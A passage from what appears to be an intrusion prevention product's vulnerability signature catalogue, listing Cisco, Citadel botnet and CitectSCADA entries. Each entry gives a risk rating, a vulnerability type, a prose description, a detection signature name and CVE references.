About this vulnerability: A vulnerability in Cisco RV320 and RV325 routers
Risk: High
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Cisco Router
Type: Insecure Configuration
Description: A vulnerability in the management interface of the Cisco RV320 and RV325 routers allows unauthenticated attackers to obtain sensitive information due to improper URL access controls. This vulnerability can be combined with CVE-2019-1652 for unauthenticated remote command execution.
Situation: HTTP_CRL-Cisco-RV320-And-RV325-Information-Disclosure-CVE-2019-1653
References:
CVE-2019-1653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653
Back to top

Cisco-RV320-And-RV325-Remote-Code-Execution-CVE-2019-1652

About this vulnerability: A vulnerability in Cisco RV320 and RV325 routers
Risk: High
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Cisco Router
Type: Code Injection
Description: A vulnerability in the management interface of the Cisco RV320 and RV325 routers allows authenticated attackers to execute arbitrary commands via HTTP POST requests. An unauthenticated attacker may exploit CVE-2019-1653 first to gain access to the required credentials, effectively allowing unauthenticated arbitrary command execution.
Situation: HTTP_CRL-Cisco-RV320-And-RV325-Remote-Code-Execution-CVE-2019-1652
References:
CVE-2019-1652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652
Back to top

Cisco-SA500-Series-Security-Appliances-SQL-Injection

About this vulnerability: A vulnerability in Cisco SA500 series Security Appliances
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco SA500 Series Security Appliances
Type: SQL Injection
Description: There is an SQL injection vulnerability in the web management interface of Cisco SA500 series security appliances. The vulnerability allows a remote attacker to execute arbitrary SQL code.
Situation: HTTP_CSU-Cisco-SA500-Series-Security-Appliances-SQL-Injection
References:
CVE-2011-2546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2546
BID-48812
http://www.securityfocus.com/bid/48812
Back to top

Cisco-SA520W-Security-Appliance-Directory-Traversal

About this vulnerability: A vulnerability in Cisco SA520W
Risk: High
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Platform: Generic
Software: Cisco SA500 Series Security Appliances
Type: Input Validation
Description: A directory traversal vulnerability has been reported in Cisco SA520W Security Appliance. Successful exploitation of this vulnerability could result in sensitive information disclosure.
Situation: HTTP_CRL-Cisco-SA520W-Security-Appliance-Directory-Traversal
Back to top

Cisco-SD-WAN-Solution-Vmanage-SQL-Injection

About this vulnerability: A vulnerability in Cisco Systems SD-WAN Solution
Risk: Moderate
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems SD-WAN Solution
Type: Input Validation
Description: Improper validation of HTTP requests in the web UI of Cisco SD-WAN Solution vManage software causes an SQL injection vulnerability that can be exploited to run arbitrary SQL statements with the privileges of the user.
Situation: HTTP_CRL-Cisco-SD-WAN-Solution-Vmanage-SQL-Injection
References:
CVE-2019-16012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16012
Back to top

Cisco-Secure-ACS-EAP-TLS-Authentication-Bypass-Vulnerability

About this vulnerability: A Cisco Secure ACS EAP-TLS Authentication Bypass vulnerability
Risk: High
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Secure ACS
Type: Malfunction
Description: A vulnerability in Cisco Secure ACS which allows remote attackers to bypass authentication by sending an invalid but cryptographically correct certificate, due to the way certificate validation is handled when the authentication method used is EAP-TLS.
Situation: Generic_UDP-Cisco-Secure-ACS-EAP-TLS-Authentication-Bypass-Vulnerability
References:
CVE-2004-1099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1099
Back to top

Cisco-Secure-ACS-Unauthorized-Password-Change

About this vulnerability: A Cisco Secure ACS Unauthorized Password Change vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1296-5242
Platform: Cisco
Software: Cisco Secure ACS
Type: Configuration Error
Description: A vulnerability in Cisco Secure ACS, versions 5.1 before 5.1.0.44.6 and 5.2 before 5.2.0.26.3, which does not properly restrict access to the password-change feature, allowing remote attackers to change arbitrary user passwords.
Situation: HTTP_CRL-Cisco-Secure-ACS-Unauthorized-Password-Change
References:
CVE-2011-0951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0951
BID-47093
http://www.securityfocus.com/bid/47093
Back to top

Cisco-Secure-ACS-Web-Management-Interface-Buffer-Overflow

About this vulnerability: Cisco Secure ACS Web Management Interface Buffer Overflow
Risk: High
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Cisco Secure ACS
Type: Malfunction
Description: There exists a buffer overflow vulnerability in Cisco Secure Access Control Server WEB interface.
Situation: HTTP_CRL-Cisco-Secure-ACS-Web-Management-Interface-Buffer-Overflow
References:
CVE-2003-0210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0210
Back to top

Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution

About this vulnerability: A vulnerability in Cisco Systems Secure Desktop
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cisco Secure Desktop
Type: Malfunction
Description: A remote code execution vulnerability exists in Cisco Secure Desktop. The vulnerability is due to a lack of validation of executables downloaded by the Secure Desktop Web CSDWebInstaller.ocx ActiveX control. Specifically, the hash in the executable's digital signature is not verified against the executable's content. This vulnerability may be exploited by remote attackers to execute arbitrary code on the affected system by enticing a user to visit a malicious web page. In attack scenarios where code execution is successful, the behaviour of the target machine is dependent entirely on the intention of the injected code, which will run within the security context of the currently logged in user.
Situation: HTTP_SS-Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution
File-Text_Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution
References:
CVE-2011-0926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0926
BID-46536
http://www.securityfocus.com/bid/46536
Back to top

Cisco-Security-Agent-Management-Center-Code-Execution

About this vulnerability: A vulnerability in Cisco Systems Security Agent Management Center
Risk: High
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Security Agent Management Center
Type: Malfunction
Description: An arbitrary file upload vulnerability exists in the Manager Center for Cisco Security Agent.
Situation: HTTP_CS-Cisco-Security-Agent-Management-Center-Code-Execution
HTTPS_SS-Cisco-Security-Agent-Management-Center-Code-Execution
References:
CVE-2011-0364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0364
BID-46420
http://www.securityfocus.com/bid/46420
Back to top

Cisco-Security-Manager-Authtokenservlet-Insecure-Deserialization

About this vulnerability: A vulnerability in Cisco Systems Cisco Security Manager (CSM)
Risk: High
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: Cisco Systems Cisco Security Manager (CSM)
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Cisco Security Manager. The vulnerability is due to insufficient validation of request to AuthTokenServlet. A remote, unauthenticated user can exploit this vulnerability by sending malicious request to the target server. Successful exploitation can result in arbitrary code execution under the security context of the affected server.
Situation: HTTP_CRL-Cisco-Security-Manager-Authtokenservlet-Insecure-Deserialization
References:
CVE-2020-27131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27131
Back to top

Cisco-Security-Manager-Ctmservlet-Insecure-Deserialization

About this vulnerability: A vulnerability in Cisco Systems Cisco Security Manager (CSM)
Risk: High
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Platform: Generic
Software: Cisco Systems Cisco Security Manager (CSM)
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Cisco Security Manager. The vulnerability is due to insufficient validation of request to CTMServlet. A remote, unauthenticated user can exploit this vulnerability by sending malicious request to the target server. Successful exploitation can result in result in arbitrary code execution under the security context of the affected server.
Situation: HTTP_CRL-Cisco-Security-Manager-Ctmservlet-Insecure-Deserialization
References:
CVE-2020-27131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27131
Back to top

Cisco-Security-Manager-Rmi-Insecure-Deserialization

About this vulnerability: A vulnerability in Cisco Systems Cisco Security Manager (CSM)
Risk: Moderate
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Cisco Security Manager (CSM)
Type: Input Validation
Description: There exists a pre-auth insecure deserialization vulnerability in Cisco Security Manager. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_CS-Cisco-Security-Manager-Rmi-Insecure-Deserialization
References:
CVE-2019-12630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12630
Back to top

Cisco-Security-Manager-Secretservice.jsp-Insecure-Deserialization

About this vulnerability: A vulnerability in Cisco Systems Cisco Security Manager (CSM)
Risk: High
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Platform: Generic
Software: Cisco Systems Cisco Security Manager (CSM)
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Cisco Security Manager. The vulnerability is due to insufficient validation of request to SecretService.jsp. A remote, unauthenticated user can exploit this vulnerability by sending malicious request to the target server. Successful exploitation can result in result in arbitrary code execution under the security context of the affected server.
Situation: HTTP_CRL-Cisco-Security-Manager-Secretservice.jsp-Insecure-Deserialization
References:
CVE-2020-27131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27131
Back to top

Cisco-Small-Business-RV-Series-Authentication-Bypass-And-Command-Injection

About this vulnerability: A vulnerability in Cisco Small Business RV series of VPN/routers.
Risk: High
First detected in: sgpkg-ips-1436-5242
Last changed: sgpkg-ips-1436-5242
Platform: Generic
Software: Cisco Small Business RV VPN/Routers
Type: Input Validation
Description: A vulnerability in Cisco Small Business RV series of VPN/routers, modules RV340, RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and below, which allows remote attackers to bypass authentication (CVE-2021-1472) and execute arbitrary commands (CVE-2021-1473) by sending a crafted sessionid in a Cookie header.
Situation: HTTP_CSH-Cisco-Small-Business-RV-Series-Authentication-Bypass-And-Command-Injection
References:
CVE-2021-1473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1473
Back to top

Cisco-Smart-Licensing-Utility-Static-Administrative-Credentials-CVE-2024-20439

About this vulnerability: A vulnerability in Cisco Smart Licensing Utility
Risk: High
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Cisco Smart Licensing Utility
Type: Backdoor
Description: Cisco Smart Licensing Utility contains undocumented but publicly known credentials with administrative access.
Situation: HTTP_CSH-Cisco-Smart-Licensing-Utility-Static-Administrative-Credentials-CVE-2024-20439
References:
CVE-2024-20439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20439
Back to top

Cisco-Systempreferences_configurable-Cross-Site-Scripting

About this vulnerability: A vulnerability in Cisco Systems Evolved Programmable Network Manager
Risk: High
First detected in: sgpkg-ips-949-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Evolved Programmable Network Manager; Cisco Systems Prime Infrastructure
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in Cisco Prime Infrastructure and Evolved Programmable Network Manager. A remote attacker can use this to execute arbitrary scripts on the target user's browser.
Situation: HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Systempreferences_configurable-Request
HTTP_CRL-Cisco-Prime-Infrastructure-And-Epnm-Systempreferences_configurable-Cross-Site-Scripting
References:
CVE-2017-6699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6699
Back to top

Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities

About this vulnerability: A vulnerability in Cisco TelePresence
Risk: Moderate
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco TelePresence
Type: Input Validation
Description: There is a cross-site scripting (XSS) vulnerability in the web interface in Cisco TelePresence System MXP Series F9.1 and earlier which allows remote authenticated users to inject arbitrary web script or HTML via certain SIP headers.
Situation: SIP-TCP_Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities
SIP-UDP_Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities
References:
CVE-2011-2543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2543
BID-49670
http://www.securityfocus.com/bid/49670
Back to top

Cisco-UCS-Director-Amf-External-Entity-Injection

About this vulnerability: A vulnerability in Cisco Systems UCS Director
Risk: High
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1385-5242
Platform: Generic
Software: Cisco UCS Director
Type: Input Validation
Description: An XML External Entity Injection vulnerability has been reported in Cisco UCS Directory. The vulnerability is due to insufficient validation of user input sent to the amf endpoint A remote, unauthenticated attacker could exploit this vulnerability by sending malicious XML data in HTTP requests to the target server. Successful exploitation could result in the disclosure of information in the context of the ucsdu user.
Situation: HTTP_CS-Cisco-UCS-Director-Amf-External-Entity-Injection
Back to top

Cisco-UCS-Director-Copyfilerunnable-Run-Symlink-Remote-Code-Execution

About this vulnerability: A vulnerability in Cisco UCS Director
Risk: Moderate
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco UCS Director
Type: Input Validation
Description: Improper input validation causes a remote code execution vulnerability in Cisco UCS Director. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Cisco-UCS-Director-Copyfilerunnable-Run-Symlink-Remote-Code-Execution
References:
CVE-2020-3247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3247
Back to top

Cisco-UCS-Director-Downloadfile-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems UCS Director
Risk: Moderate
First detected in: sgpkg-ips-1246-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco UCS Director
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Cisco UCS Director. Successful exploitation could lead in information disclosure.
Situation: HTTP_CRL-Cisco-UCS-Director-Downloadfile-Directory-Traversal
References:
CVE-2020-3250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3250
Back to top

Cisco-UCS-Director-Isenablerestkeyaccesscheckforuser-Auth-Bypass-Vulnerability

About this vulnerability: A vulnerability in Cisco Systems UCS Director
Risk: Moderate
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco UCS Director
Type: Input Validation
Description: Insufficient validation of request contents causes an authentication bypass vulnerability in Cisco UCS Director. A successful exploit may allow an attacker to bypass authentication.
Situation: HTTP_CS-Cisco-UCS-Director-Isenablerestkeyaccesscheckforuser-Authentication-Bypass-Vulnerability
References:
CVE-2020-3243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3243
Back to top

Cisco-UCS-Director-Mycallable-Call-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems UCS Director
Risk: Moderate
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco UCS Director
Type: Directory Traversal
Description: Insufficient validation of file paths in HTTP requests causes a director traversal vulnerability in Cisco UCS Director. A successful attack may allow an attacker to write files to arbitrary and potentially executable locations on the target system.
Situation: HTTP_CS-Cisco-UCS-Director-Mycallable-Call-Directory-Traversal
References:
CVE-2020-3251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3251
Back to top

Cisco-UCS-Director-Savestaticconfig-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems UCS Director
Risk: Moderate
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco UCS Director; Cisco UCS Director Express for Big Data
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Cisco UCS Directory. The vulnerability is due to insufficient validation of user input in the saveStaticConfig method. A remote authenticated attacker can exploit the vulnerability by sending malicious requests to the target server. Successful exploitation could result in arbitrary file write and, in the worst case, remote code execution under the security context of web server.
Situation: HTTP_CRL-Cisco-UCS-Director-Savestaticconfig-Directory-Traversal
References:
CVE-2020-3248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3248
Back to top

Cisco-UCS-Director-Savewindowsnetworkconfig-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems UCS Director
Risk: Moderate
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco UCS Director
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in Cisco UCS Director. Successful exploitation could lead in denial of service conditions.
Situation: HTTP_CRL-Cisco-UCS-Director-Savewindowsnetworkconfig-Directory-Traversal
References:
CVE-2020-3249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3249
Back to top

Cisco-UCS-Director-Scriptmoduleaddjarpage-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems UCS Director
Risk: Moderate
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco UCS Director
Type: Directory Traversal
Description: Improper validation of inputs to the ScriptModuleAddJarPage method causes a directory traversal vulnerability in Cisco UCS director. A successful exploit allows an attacker to write arbitrary files on the target system.
Situation: HTTP_CRL-Cisco-UCS-Director-Scriptmoduleaddjarpage-Directory-Traversal
References:
CVE-2020-3240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3240
Back to top

Cisco-UCS-Director-Unauthenticated-RCE

About this vulnerability: A vulnerability in Cisco UCS Director
Risk: High
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1614-5242
Platform: Generic
Software: Cisco UCS Director
Type: Input Validation
Description: A vulnerability in Cisco UCS Director virtual appliance, versions 6.6.0 and 6.7.0, which allows remote attackers to execute arbitrary code by bypassing authentication, CVE-2019-1937, and injecting code in a password change form CVE-2019-1936.
Situation: HTTP_CS-Cisco-UCS-Director-Unauthenticated-RCE
HTTP_CRL-Cisco-UCS-Director-Unauthenticated-RCE
References:
CVE-2019-1936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1936
Back to top

Cisco-Unified-Communications-Manager-Multiple-SQL-Injections

About this vulnerability: An attempt to exploit SQL injection vulnerability in Cisco Unified Communications Manager
Risk: High
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Unified Communications Manager
Type: SQL Injection
Description: Multiple SQL injection vulnerabilities exist within Cisco Unified Communications Manager. These vulnerabilities could be exploited by remote attackers to conduct SQL injection attacks on the server.
Situation: HTTP_CRL-Cisco-Unified-Communications-Manager-Multiple-SQL-Injections
References:
CVE-2011-1610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1610
BID-47607
http://www.securityfocus.com/bid/47607
Back to top

Cisco-Unified-Contact-Center-Express-Rmi-Insecure-Deserialization

About this vulnerability: A vulnerability in Cisco Systems Unified Contact Center Express (UCCX)
Risk: High
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Unified Contact Center Express (UCCX)
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Cisco Unified Contact Center Express. This vulnerability is due to deserialization of untrusted data. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution as the root user.
Situation: Generic_CS-Cisco-Unified-Contact-Center-Express-Rmi-Insecure-Deserialization
References:
CVE-2020-3280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3280
Back to top

Cisco-Webex-Magic-Url-Remote-Command-Execution

About this vulnerability: A vulnerable WebEx Extension
Risk: High
First detected in: sgpkg-ips-845-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cisco Webex Player
Type: Code Injection
Description: Cisco's WebEx extension jlhmfgmfgeifomenelglieieghnjghma has a vulnerability that allows a remote attacker to execute arbitrary code on the affected system.
Situation: HTTP_CSU-Cisco-Webex-Magic-Url-Remote-Command-Execution
File-Text_Cisco-Webex-Magic-Url-Remote-Command-Execution
References:
CVE-2017-3823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3823
Back to top

Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF

About this vulnerability: Buffer overflow vulnerability in Cisco Webex Meeting Manager
Risk: High
First detected in: sgpkg-ips-166-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Cisco Webex Meeting Manager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Cisco Webex Meeting Manager. A remote attacker can exploit the vulnerability by enticing a user to visit a web page that contains malicious usage of the vulnerable WebexUCFObject ActiveX control. A successful exploit allows arbitrary code execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF
File-Text_Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF
References:
CVE-2008-3558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3558
BID-30578
http://www.securityfocus.com/bid/30578
OSVDB-47344
http://www.osvdb.org/47344
Back to top

Cisco-Webex-Player-.wrf-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Cisco Systems WebEx Player
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Webex Player
Type: Buffer Overflow
Description: A stack buffer overflow exists in Cisco WebEx Player. The vulnerability is due to improper handling of specially crafted .wrf files which results in a stack buffer overflow that can overwrite a function pointer to create reliable code execution. To exploit this vulnerability an attacker must entice a user to open a specially crafted .wrf file. Successful exploitation will result in arbitrary code execution in the context of the application.
Situation: File-Binary_Cisco-Webex-Player-BOF
References:
CVE-2010-3269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3269
BID-46075
http://www.securityfocus.com/bid/46075
Back to top

Cisco-Webex-Player-Atas32.dll-Remote-Code-Execution

About this vulnerability: A vulnerability in Cisco Systems WebEx Player
Risk: Moderate
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Webex Player
Type: Malfunction
Description: There is a code execution vulnerability in Cisco WebEx Player. The vulnerability is found in ATAS32.DLL and is due to insufficient validation of some values in record Type 0x1F and Type 0xBB while processing WebEx Recording Format (WRF) files. The code uses these values in determining the source, size and the destination pointer of a memcpy(). A remote unauthenticated attacker can leverage this vulnerability by crafting records of Type 0x1F and Type 0xBB in a WRF file and enticing the target users to view the malicious file. Successful exploitation would result in execution of arbitrary code on the target host in the context of the application.
Situation: File-Binary_Cisco-Webex-Player-Atas32.dll-Remote-Code-Execution
References:
CVE-2011-4004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4004
OSVDB-76571
http://www.osvdb.org/76571
Back to top

Cisco-Webex-Recording-Format-Player-Atas32.dll-Integer-Overflow

About this vulnerability: A vulnerability in Cisco Systems WebEx Player
Risk: Moderate
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Webex Player
Type: Integer Overflow
Description: There is a code execution vulnerability in Cisco WebEx Recording Format (WRF) Player. This vulnerability is due to an integer overflow leading to a heap buffer overflow when processing WRF files. A remote unauthenticated attacker can leverage this vulnerability by crafting a WRF file and enticing the target user to view the malicious file. Successful exploitation would result in execution of arbitrary code on the target host in the context of the currently logged on user.
Situation: File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Integer-Overflow
References:
CVE-2012-1336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1336
OSVDB-81105
http://www.osvdb.org/81105
Back to top

Cisco-Webex-Recording-Format-Player-Atas32.dll-Memory-Corruption

About this vulnerability: A vulnerability in Cisco Systems WebEx Player
Risk: Moderate
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Webex Player
Type: Malfunction
Description: A code execution vulnerability exists in Cisco WebEx Recording Format (WRF) Player. This vulnerability is due to a write-what-where memory corruption when the WRF player handles WRF files. A remote, unauthenticated attacker can leverage this vulnerability by crafting a WRF file and enticing a target user to view the malicious file. Successful exploitation would result in execution of arbitrary code on the target host in the context of the application.
Situation: File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Memory-Corruption
References:
CVE-2012-3939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3939
BID-55866
http://www.securityfocus.com/bid/55866
OSVDB-86138
http://www.osvdb.org/86138
Back to top

Cisco-Webex-Recording-Format-Player-Atas32.dll-Subrecords-Integer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in Cisco Systems WebEx Player detected
Risk: Moderate
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Webex Player
Type: Integer Overflow
Description: There is a integer overflow vulnerability in Cisco WebEx Recording Format yPlayer due to improper bounds checking, which allows remote attackers to execute arbitrary code via a crafted WRF file.
Situation: File-Binary_Cisco-Webex-Recording-Format-Player-Atas32.dll-Subrecords-Integer-Overflow
References:
CVE-2012-1337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1337
OSVDB-81106
http://www.osvdb.org/81106
Back to top

Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Buffer-Overflow

About this vulnerability: A vulnerability in Cisco Systems WebEx Player
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Webex Player
Type: Buffer Overflow
Description: There exists a code execution vulnerability in Cisco WebEx Recording Format Player.
Situation: File-Binary_Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Buffer-Overflow
References:
CVE-2012-1335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1335
OSVDB-81104
http://www.osvdb.org/81104
Back to top

Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Integer-Overflow

About this vulnerability: A vulnerability in Cisco Systems WebEx Player
Risk: Moderate
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Webex Player
Type: Integer Overflow
Description: There is a code execution vulnerability in Cisco's WebEx Recording Format (WRF) Player. This vulnerability is due to an integer overflow leading to a buffer overflow when the WRF player handles WRF files. A remote unauthenticated attacker can leverage this vulnerability by crafting a WRF file and enticing the target users to view the malicious file. Successful exploitation would result in execution of arbitrary code on the target host in the context of the application.
Situation: File-Binary_Cisco-Webex-Recording-Format-Player-Atdl2006.dll-Integer-Overflow
Back to top

Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution

About this vulnerability: A vulnerability in Cisco Webex Teams
Risk: Moderate
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Webex Teams
Type: Input Validation
Description: Improper sanitization of user-supplied data in a DLL loading path option causes a vulnerability in Cisco Webex Teams. A successful attack allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_SHS-Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution
File-Text_Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution
References:
CVE-2019-1636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1636
Back to top

Cisco-Wireless-IP-Phone-Stack-Based-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in Cisco Wireless IP Phone detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: Cisco IP Phone
Type: Malfunction
Description: An attempt to exploit a vulnerability in Cisco Wireless IP Phone detected.
Situation: HTTP_CSU-Cisco-Wireless-IP-Phone-Stack-Based-Buffer-Overflow
References:
CVE-2020-3161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3161
Back to top

Citadel-Botnet

About this vulnerability: Citadel botnet
Risk: High
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: Citadel is a malicious botnet which poses a serious threat to Internet users. Most notably, Citadel engages in trojan activity as an information stealer and a tool to commit banking fraud. In addition, it may download further malicious modules. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation: HTTP_SHS-Citadel-Botnet-Traffic
Back to top

Citadel_UX-Lprintf-Function-Format-String

About this vulnerability: Format string vulnerability in the lprintf function in Citadel/UX
Risk: High
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Citadel
Type: Format String
Description: Citadel/UX Bulletin Board Service (BBS) program is vulnerable to a format string attack due to the failure of properly sanitising user-supplied input passed to the lprintf function. A remote attacker could exploit this vulnerability to gain root access on the system.
Situation: Generic_Citadel-UX-Lprintf-Function-Format-String
References:
CVE-2004-1192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1192
BID-11885
http://www.securityfocus.com/bid/11885
OSVDB-12344
http://www.osvdb.org/12344
Back to top

CitectSCADA-ODBC-Service-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in CitectSCADA
Risk: High
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: CitectSCADA; CitectFacilities
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in CitectSCADA. The vulnerability is caused by insufficient input validation in the ODBC interface of the product. A successful attacker may execute arbitrary code in the context of the ODBC service.
